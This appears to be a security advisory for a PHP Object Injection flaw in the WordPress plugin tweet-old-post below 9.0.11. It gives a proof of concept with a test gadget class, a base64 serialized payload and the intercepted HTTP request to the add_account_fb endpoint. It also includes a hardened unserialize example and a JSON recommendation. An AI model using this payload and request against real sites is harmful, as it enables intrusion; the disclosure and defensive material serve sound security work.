The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admins to perform PHP Object Injection when a suitable gadget chain is present.

To simulate a gadget chain, put the following code in a plugin:

```php
class Evil {
    public function __wakeup(): void {
        die("Arbitrary deserialization");
    }
}
```

Use the add account function, intercept the request, and add or replace the `id` or `pages` parameter with `Tzo0OiJFdmlsIjowOnt9Ow==` (the base64 encoding of `O:4:"Evil":0:{};`):

```http
POST /wp-json/tweet-old-post/v8/api/?req=add_account_fb HTTP/1.1

{"id":"Tzo0OiJFdmlsIjowOnt9Ow==","pages":["Tzo0OiJFdmlsIjowOnt9Ow=="]}
```
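Added example (not the plugin's or the advisory's code): the `Evil` gadget from the PoC beside a hardened settings loader that refuses to instantiate any class, so a magic method such as `__wakeup()` never runs on attacker-controlled input. The function names and the fix itself are assumptions, not the vendor's patch.

```php
<?php
// The gadget from the advisory: instantiating it during unserialize() runs __wakeup().
class Evil {
    public function __wakeup(): void {
        die("Arbitrary deserialization");
    }
}

// Payload from the advisory: base64 of O:4:"Evil":0:{};
$payload = 'Tzo0OiJFdmlsIjowOnt9Ow==';

// Vulnerable pattern (assumed shape of the affected code): unserialize() with
// default options instantiates any class loaded in the process.
function load_setting_vulnerable(string $encoded) {
    return unserialize(base64_decode($encoded));
}

// Hardened pattern (assumed fix): allowed_classes=false turns every serialized
// object into __PHP_Incomplete_Class, whose magic methods are never invoked;
// anything that still contains an object is then rejected outright.
function load_setting_hardened(string $encoded) {
    $decoded = base64_decode($encoded, true); // strict: reject non-base64 bytes
    if ($decoded === false) {
        return null;
    }
    $value = unserialize($decoded, ['allowed_classes' => false]);
    if ($value === false && $decoded !== 'b:0;') {
        return null; // malformed serialized data
    }
    $hasObject = is_object($value);
    if (is_array($value)) {
        array_walk_recursive($value, function ($v) use (&$hasObject) {
            if (is_object($v)) {
                $hasObject = true;
            }
        });
    }
    return $hasObject ? null : $value; // settings are scalars/arrays, never objects
}

var_dump(load_setting_hardened($payload));                          // NULL, __wakeup() not called
var_dump(load_setting_hardened(base64_encode(serialize('12345'))));  // string(5) "12345"
// load_setting_vulnerable($payload) would terminate the script via Evil::__wakeup()
```

If the stored value is only ever scalars and arrays, replacing serialize()/unserialize() with json_encode()/json_decode() removes the object-instantiation surface entirely.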
| CPE | Name | Operator | Version |
|---|---|---|---|
| | tweet-old-post | lt | 9.0.11 |